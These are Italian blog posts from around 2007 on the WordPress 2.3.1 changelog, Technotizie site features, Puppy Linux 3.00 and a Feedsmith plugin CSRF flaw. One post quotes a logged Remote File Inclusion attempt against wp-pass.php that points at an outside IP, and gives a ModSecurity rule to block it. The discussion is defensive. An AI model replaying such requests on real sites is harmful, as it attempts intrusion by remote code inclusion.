Come sempre consiglio caldamente di aspettare sempre quache sub-version dopo il rilascio di Wordpress 2.3 però per chi avesse aggiornato il tutto, ecco alcuni dei change log di questa prima sub-version.

• Miglioramenti nell'estrazione dell'indirizzo email address in wp-mail.php (#5169).
• Miglioramento del link manager per assicurare che solo l'utente che gestisce i link abbia la possibilità di accedere alla pagina. (#4627).
• Un security fix per assicurarsi che edit-post-rows.php non possa essere caricato direttamente prevenendo così attacchi XSS quando la variabile register_globals è abilitata ([6258]).
• Raggruppare le queries SQL usate durante l'aggiornamento per rimuovere errori su entità duplicate nelle vecchie tabelle post2cat e link2cat (#5223).
• Fix vari all'assegnamento delle categorie durante l'importazione di file da formato OPML (#5107)
• File Manifest per Windows Live Writer così da abilitare il supporto per il tagging (#5023).
• Miglioramenti più performanti per la Taxonomy intersection queries (#5137).
• Esclusione dell'anteprima del post dalla canonicalizzazione (#5203)
• Miglioramenti al supporto della query principale per assicurarsi che essa sia salvata quando viene richiamato wp() (#5121).
• Fix nell' in-line uploader in modo che lo spedire lavori anche senza titolo (#5080).
• Rimozione della case-sensitivity (differenza maiuscole minuscole) sui nomi degli host attraverso wp_safe_redirect() (#5114).
• Cambi nell'ordine di caricamento dei file js per permettere che Prototype sia caricato prima di JQuery (#5067).
• Imposizione delle stesse regole di sanitisation per le pagine e per i posts (#5135)

Alcuni plugin compatibili da far propri sono: Feedburner Feedsmith NoFollowFree Plugin Vari wp 2.3 Google (XML) Sitemaps Generator for WordPress Related Posts Inoltre a chi avesse dei problemi con i link in ingresso provenienti da Google Blog Search con wordpress 2.3 consiglio questo articolo su levysoft. Via westi

Volevo ringraziare in questo post davide calabrò per aver fornito agli utenti e blogger di Excite la possibilità di integrare technotizie all'interno dei loro blog. Questo mi ha spronato a creare un script in javascript per integrare facilmente qualsiasi sito su technotizie. Presto sarà rilasciato ufficialmente. Per il momento per quanto riguarda il codice e la procedura da seguire vi rimando al post di cala.

Donncha ha rilasciato un post dal titolo "tenere lontani i libwww-perl bot " usando il mod_rewrite e bloccando lo HTTP_USER_AGENT per prevenire attacchi. Questo comunque non sembra funzionare. Il perché è presto detto, E' semplice cambiare la stringa dello HTTP_USER_AGENT e l'attacco che si potrebbe verificare potrebbe non usare una stringa relativa allo user-agent standard quale libwww-perl user-agent . Inoltre, le possibilità che delegittimiate la lettura del vostro feed e di altri strumenti web che hanno accesso al vostro blog sono davvero tante. Donncha’s mostra un esempio di questo attacco:

GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? …
“libwww-perl/5.805″

Questa richiesta sembrerebbe provare ad eseguire l'exploit tramite un RFI (Remote File Inclusion vulnerability) . Ma a quanto confermano BlogWatch e altri non sembrerebberi esserci vulnerabilità del genere sulla piattaforma Wordpress al momento. Potrei pensare ad un bug nei vari themes/templates oppure nei plugin installati e disponibili online ma sul solo wp e sul file incriminato wp-pass.php non sembrano esserci bugs di questo tipo. Alcune regole per tenere lontani questi bot potete trovarle all'interno di questa pagina Comunque un altro modo per poter prevenire gli attacchi potrebbe avvenire attraverso l'uso di un firewall per Apache open source chiamato ModSecurity. La regola, poi, dovrebbe essere la seguente:

SecFilterSelective REQUEST_URI "wp-pass.php?_wp_http_referer"

Naturalmente se dipendete da librerie libwww-perl non usate queste regole altrimenti potreste ritrovarvi con il blog non più funzionante.

Forse riesco a trovare 10 minuti per un post... forse... Dunque l'ultimo aggiornamento risale ad un pò di tempo fa. Allora, visto che sono le 3.25 a.m e il tempo è tiranno sarò succinto. Appena possibile approfondirò alcune nuove caratteristiche che ho implementato in Technotizie. Come penso avrete già notato, technotizie si è arricchito di alcune piccole e nuove funzionalità.

Innanzitutto è stato implementato l'uso di un piccolo frame per le notizie che permette di leggere le stesse e al contempo conferisce al lettore la possibilità di votarle o commentarle direttamente dal sito dell'autore della news o del link. E' stata migliorata la funzionalità di ricerca all'interno del sito. E' stata implementata la possibilità di modificare i propri commenti. E' stato corretto un errore nella stampa dell'orario dei feed rss in conformità allo standard rfc 822 Possibilità di inserire dei video correlati alla notizia. Nel momento in cui vi parlo è possibile includere video presenti solo sui seguenti servizi.

• Youtube
• Myspace
• Google Video
• Msn Video
• Coolstreaming
• Venoh
• Libero Video
• File .mov
• File .qt
• File .rm
• File .mpg
• File .avi
• File .wmv

Ho implementato anche la possibilità di inserire delle tags (etichette) in grado di definire meglio l'appartenenza del vostro link o della vostra news che quanto prima saranno raccolte in una tag cloud. Fix bug nel sistema di votazione da utenti anonimi. Se avete suggerimenti naturalmente sono i benvenuti. Per farlo potete lasciare un commento oppure contattatarmi sul blog o tramite Technotizie. (Ringranzio Guido e David per avermi segnalato alcuni di questi problemi) p.s. L'interfaccia grafica mi riprometto di migliorarla quanto prima. p.p.s: In arrivo, invece, un plugin per wordpress che integra technotizie al suo interno. Vi lascio cosciente dell'orario, le 3.40 a.m, saluto tutti. Best Regards, Antonio Trigiani

Puppy Linux è arrivata alla versione 3.00. Fedele alla tradizione la nuova Puppy Linux, come al solito leggerissima ( la distro Live occupa soltanto 96MB). Questa 3.00 e all'insegna di una "mini" rivoluzione: tutto il sistema è stato aggiornato per garantire la massima compatibilità con la distro Slackware v. 12.Si avranno quindi glibc 2.5, gcc 4.1.2, gtk 2.10.13 e in generale tutte le librerie di Slackware 12. Si avrà quindi la possibilità di installare pacchetti realizzati per la distribuzione Slack 12 su Puppy Linux. Le altre novità riguardano la riscrittura degli script di avvio, configurazione e spegnimento. La gestione dei drive USB nel caso in cui si voglia installare Puppy su questo tipo di periferiche è stata molto migliorata. Alcuni screenshots li trovate su ReviewLinux Download: Puppy Linux 3.00 Via Ossblog

Feedsmith Feedburner, famoso plugin di wordpress è vulnerabile ad attacchi del tipo CSRF che potrebbero consentire ad un aggressore di dirottare i feed dei vostri blog.

La pagina del popolare plugin dice questo:

Questo plugin dirotta il 100% del traffico dei vostri feed sul feed di Feedburner che avete creato sul servizio. FeedBurner può tracciare tutto il traffico dei vostri feed e l'uso che ne viene fatto per poi applicarci una varietà di features che sceglierete per migliorare i vostri feeds su Wordpress.

In altre parole, se un attacker può contrallare il vostro Feedburner plugin, significa che al 100% può controllare il traffico del vostro feed e dirottarlo (hijack)….Potrebbero,inoltre, essere tracciati tutti i sottoscrittori, il traffico, l'uso...

POC

(continua a leggere...)